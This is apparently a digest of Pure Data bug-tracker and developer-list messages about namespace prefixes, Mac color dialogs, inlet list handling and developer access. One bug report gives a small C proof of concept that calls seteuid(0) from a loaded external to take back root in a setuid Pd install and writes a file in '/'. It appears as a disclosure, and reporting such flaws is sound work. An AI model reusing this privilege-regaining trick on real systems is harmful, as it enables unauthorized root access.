This should be fixed in the Pd-0.39.3-extended release. It was caused by
compiler optimization fighting with non-C99 compliant code (ie strict
aliasing issues).

Which version of Pd-extended is this? Also, the build date is helpful,
you can see that in the Pd window in the Gem report.

Summary: namespace prefixes broken
Initial Comment:
It is no longer possible to use [prefix/classname]
syntax, which is essential to the namespaces because it
is the only way that two classes with the same root
classname could be used in the same patch, i.e. like
this, where each object is a different class:
[prepend]
[cxc/prepend]
[cyclone/prepend]
This is because with the new sys_onloadlist()
functionality that checks to see whether a class has
already been loaded. It only uses the direct
classname, not the prefix also.

Tested with Pd-0.40.3-extended-20071105 on Mac OS X and namespace prefixes
work as they used to (tho not quite as they should), so I am closing this
bug.

i totally agree that it must be fixed for pd-extended (thanks for
changing the category)
however: i just downloaded
Pd-0.40.3-extended-20071016-debian-testing-i386.deb from the 2007-10-16
autobuilds, extracted it and ran my testpatch with your Pd version: it
worked just fine
can you confirm on which versions this bug appears?

This will need to be fixed for the Pd-0.40.3-extended release.

if you re-open this bug-report, could you please comment on why you do
so?
i attach an example that illustrates that namespaces work in pd-0,41;
i do not claim that they work in pd-0.40, since they don't;
afair, it has always been millers policy to fix bugs in new releases
rather than maintain old branches.

Summary: Mac: color presets bogus in property dialog
Initial Comment:
Hi all,
for the MacOS version of PD (i think irrelevant which one) the color
presets aren't colorful but uniformly transparent (or "white"), which
makes it impossible to really pick a color.
Composing a color works, but the buttons (test label etc.) don't show
the color as well.
I'm using TCL/TK 8.4.9 under OSX.3.9

This is fixed in Pd-extended, and there is a patch in to fix this, but I
am not sure whether Miller has accepted that patch (yet?).

Summary: security vulnerability, giving root access
Initial Comment:
first configure with --enable-setuid or just chmod 4755 pd && chown root pd, which has the same effect.
then load this external called crack.c by making a [crack] box or -lib crack:
#include <unistd.h>
#include <stdio.h>
void crack_setup (void) {
seteuid(0);
fopen("/hax0r","w");
}
An empty file called "hax0r" appears in protected folder "/" even though privileges have been dropped by pd upon startup.

I am pretty sure this the bug fixed by Miller's 0.40.3 and 0.39.3

Hi all,
Here is my formal request to be added as a pd developer. I have a growing
set of externals and patches that I would like to submit to the cvs and
pd-extended builds concerning additive synthesis, SDIF, and controlling
these using a wacom tablet. Also, compositions and a website are coming
soon too!
regards,
rich

Is this the patch<http://sourceforge.net/tracker/index.php?func=detail&aid=1543850&group_id=5…>?
I'm not currently a developer, but I'll commit the file if you add my SF
account: reakin . I'm was also planning to commit some SDIF and oscillator
bank externals I've been working on, so now might be a good time to join the
developer crew.
Hans, how did you get the fonts looking so nice in pd-extended 0.39? My
patches look ugly in Pd-vanilla, don't know why.
regards,
rich

Summary: accept atoms as lists on righthand inlets
Initial Comment:
when an object has a list-method on its left inlet, it will happily accept floats and symbols as well (and handle them as 1-atom lists), if no specific method for these types is defined.
however, this is not true for right-hand inlets.
if such an inlet (with a "list" method, as declared with
receives a single float number (as output by the numberbox), it bails out with
"error: inlet: expected 'list' but got 'float'"
this is especially sad, as there is no way to add methods for several types of messages to a right-hand inlet (well, there are methods like using proxys; but we don't want to go into that)
a workaround for this is to run the message through [list] (or [list $1(), however i would rather not use this.
instead, the attached patch fixes this by modifying the inlet_* methods in m_obj.c to fallback to inlet_list() if all else fails.
btw, this is the code i use to add a list-method to the 2nd outlet:
new{
...
inlet_new(&x->x_obj, &x->x_obj.ob_pd, &s_list, gensym("list2"));
}
setup{
...
class_addmethod(myobj_class, (t_method)myobj_list2, gensym("list2"), A_GIMME, 0);
})

Sounds very useful, but I am sure there have got to be some unwanted
ramifications. Do you have any idea what they might be?
Is this ready to be included in 0.40.3-extended ?
